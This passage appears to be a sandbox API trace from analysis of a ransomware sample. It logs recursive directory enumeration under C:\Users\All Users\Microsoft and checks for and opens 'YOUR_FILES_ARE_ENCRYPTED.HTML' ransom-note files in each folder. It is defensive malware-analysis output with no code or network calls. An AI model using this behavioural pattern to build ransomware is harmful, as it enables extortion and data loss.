GetProcessHeap () returned 0x600000 [0110.167] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.168] GetProcessHeap () returned 0x600000 [0110.168] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.168] GetProcessHeap () returned 0x600000 [0110.168] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.168] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaef85deb, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef85deb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", cAlternateFileName="{FC01E~1")) returned 0 [0110.168] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0110.168] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0110.168] GetProcessHeap () returned 0x600000 [0110.168] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.177] GetProcessHeap () returned 0x600000 [0110.177] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.177] GetProcessHeap () returned 0x600000 [0110.177] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.178] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3840877a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3840877a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="Search", cAlternateFileName="")) returned 1 [0110.178] StrStrIW (lpFirst="Search", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.178] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search") returned 39 [0110.178] GetProcessHeap () returned 0x600000 [0110.178] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.179] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search" [0110.179] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*" [0110.179] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3840877a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaefeb34c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.179] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3840877a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaefeb34c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.179] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Data", cAlternateFileName="")) returned 1 [0110.179] StrStrIW (lpFirst="Data", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.179] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data") returned 44 [0110.179] GetProcessHeap () returned 0x600000 [0110.179] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.180] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data" [0110.180] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*" [0110.180] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaefe0529, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.180] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaefe0529, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0110.180] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="Applications", cAlternateFileName="APPLIC~1")) returned 1 [0110.180] StrStrIW (lpFirst="Applications", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.180] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications") returned 57 [0110.180] GetProcessHeap () returned 0x600000 [0110.180] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.181] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications" [0110.181] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*" [0110.181] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaefd053f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c6f0, dwReserved1=0x630690, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0110.182] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaefd053f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c6f0, dwReserved1=0x630690, cFileName="..", cAlternateFileName="")) returned 1 [0110.182] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x63dc6bf9, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63dc6bf9, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c6f0, dwReserved1=0x630690, cFileName="Windows", cAlternateFileName="")) returned 1 [0110.182] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaefd053f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaefd053f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefd400c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c6f0, dwReserved1=0x630690, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.182] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaefd053f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaefd053f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefd400c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c6f0, dwReserved1=0x630690, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.182] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0110.182] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0110.182] GetProcessHeap () returned 0x600000 [0110.182] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.182] GetProcessHeap () returned 0x600000 [0110.182] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.182] GetProcessHeap () returned 0x600000 [0110.182] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.183] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3847afbf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3847afbf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6407587b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="Temp", cAlternateFileName="")) returned 1 [0110.183] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.183] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp") returned 49 [0110.183] GetProcessHeap () returned 0x600000 [0110.183] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.184] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp" [0110.184] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*" [0110.184] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3847afbf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3847afbf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaefda1a2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c6f0, dwReserved1=0x630690, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.185] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3847afbf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3847afbf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaefda1a2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c6f0, dwReserved1=0x630690, cFileName="..", cAlternateFileName="")) returned 1 [0110.185] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaefda1a2, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaefda1a2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefddc15, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c6f0, dwReserved1=0x630690, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.185] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaefda1a2, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaefda1a2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefddc15, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c6f0, dwReserved1=0x630690, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.185] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.185] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0110.185] GetProcessHeap () returned 0x600000 [0110.185] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.185] GetProcessHeap () returned 0x600000 [0110.185] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.185] GetProcessHeap () returned 0x600000 [0110.185] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.186] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaefe0529, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaefe0529, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefe3dd0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.186] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaefe0529, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaefe0529, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefe3dd0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.186] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.186] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0110.186] GetProcessHeap () returned 0x600000 [0110.186] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.187] GetProcessHeap () returned 0x600000 [0110.187] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.187] GetProcessHeap () returned 0x600000 [0110.187] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.188] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefe8c03, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaefe8c03, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefeedf1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.188] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefe8c03, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaefe8c03, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefeedf1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.188] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.188] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0110.188] GetProcessHeap () returned 0x600000 [0110.188] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.188] GetProcessHeap () returned 0x600000 [0110.188] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.188] GetProcessHeap () returned 0x600000 [0110.188] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.189] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbca7cf5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbca7cf5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="SmsRouter", cAlternateFileName="SMSROU~1")) returned 1 [0110.189] StrStrIW (lpFirst="SmsRouter", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.189] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter") returned 42 [0110.189] GetProcessHeap () returned 0x600000 [0110.189] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.190] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter" [0110.190] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\*" [0110.190] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbca7cf5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbca7cf5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.191] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbca7cf5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbca7cf5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.191] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, 